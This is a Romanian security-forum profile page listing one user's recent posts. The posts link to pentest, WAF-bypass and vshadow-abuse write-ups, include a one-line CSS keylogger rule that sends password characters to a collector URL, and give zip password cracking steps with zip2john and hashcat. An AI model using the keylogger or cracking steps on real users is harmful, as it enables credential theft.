Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


u0m3 last won the day on February 2

u0m3 had the most liked content!

Community Reputation

264 Excellent


About u0m3

  • Rank
    Registered user
  • Birthday 12/14/1987

Profile Information

  • Gender
  • Location
  • Interests


  • Location

Recent Profile Visitors

2412 profile views
  1. Asta e troll, nu? Adica sper did tot sufletul ca e troll. Exista atatea sabloane de CV. Nu poti sa trimiti asa ceva cu intentii serioase, nu?
  2. Synopsis: A Scary Thought: I’ve worked in the Cyber Security space performing a wide breadth of penetration and red team services for years. Yes it’s still as easy (if not more so in this day and age!) to obtain Domain Admin “before lunch” as it was when I first started pen-testing. Back in September of 2013, Spider Labs wrote an article titled “Top Five Ways SpiderLabs Got Domain Admin on Your Internal Network” This article is written to compliment and serve as a Part 2 of sorts to the original SpiderLabs Blog post. Link: https://medium.com/@adam.toscher/top-five-ways-i-got-domain-admin-on-your-internal-network-before-lunch-2018-edition-82259ab73aaa Via:
  3. Sincer, nu prea cred ca multumea cineva cuiva... Vezi ca le dai idei. In alta ordine de idei, cine a preluat (sau a scris/transcris) citatul de pe Maszol.ru (care e de fapt maszol.ro) a dat-o de gard grav, cu traducerea Zici ca e telefonul fara fir. Ce scrie pe http://securityaffairs.co/wordpress/70046/cyber-crime/raiffeisen-cyber-heist.html: Ce scrie pe http://www.maszol.ro/index.php/szajtato/93368-az-evszazad-rablasa-kifosztottak-egy-nagy-bank-romaniai-automatait: Ce ar trebui sa scrie: Sa nu mai aducem in discutie traducerea din Maghiara (presupun) in Engleza.
  4. Cyber Security Challenge Belgium

    Pacat ca pare a fi rezervata studentilor din Belgia.
  5. Python script to decode common encoded PowerShell scripts. Source: https://github.com/JohnLaTwC/PyPowerShellXray
  6. CSS Keylogger

    Ideea de baza este folosirea selectorilor CSS pe baza de valori pentru a face request-uri fictive de background-image, cam asa input[type="password"][value$="a"] { background-image: url("http://localhost:3000/a"); } Sursa: https://github.com/maxchehab/CSS-Keylogging
  7. Inlaturare parola arhiva zip

    In general, daca fisierul tau zip nu se numeste test.zip, e normal sa se planga ca nu il gaseste. Zic si eu.
  8. Inlaturare parola arhiva zip

    Daca este o arhiva zip normala, poti incerca zip2john (program utilitar din suita JohnTheRipper). Cam in felul acesta: zip2john test.zip > test.zip.hash Acum, daca ai noroc, poti folosi hashcat pentru a face partea de brute-force/dictionary-attack/etc folosind OpenCL/CUDA. Daca hash-ul este de forma test.zip:$pkzip2$1*2*2*0*1c*10*f30b8770*0*3e*0*1c*f30b*495b*14f1b9c5523b908446a836c0ee0f109fdf033eb16a8b360d528c3a4c*$/pkzip2$:::::test.zip (adica apare acel $pkzip2$) vei fi nevoit sa te multumesti cu performanta cpu. Cat despre IDA, ai incercat sa ii faci debgging in timp ce ruleaza, sa vezi cam ce si cum face?
  9. Scuzati-mi impertinenta ignoranta, dar de ce?
  10. Help for me ? Password decyrpt ?

    @dariusgui97: one word: hashcat
  11. De pe Linux se poate cu chntpw. Tutorial cu Kali.
  12. Synopsis: The specification tells parsers to be able to parse two encodings: UTF-8 and UTF-16. Many parsers support a little bit more, but for the demonstration these two are enough. In this article you will meet a variety of XML encodings, and learn how to bypass a WAF with them. WAFs see a white noise instead of the document! Link: https://mohemiv.com/all/evil-xml/ Via:
  13. Synopsis: Vshadow (vshadow.exe) is a command line utility for managing volume shadow copies. This tool is included within the Windows SDK and is signed by Microsoft. Vshadow has a lot of functionality, including the ability to execute scripts and invoke commands in support of volume shadow snapshot management. Not surprisingly, these capabilities can be abused for privileged-level evasion, persistence, and file extraction. Link: https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/ Via:
  14. IDA 7.0 freeware

    Link direct: https://www.hex-rays.com/products/ida/support/download_freeware.shtml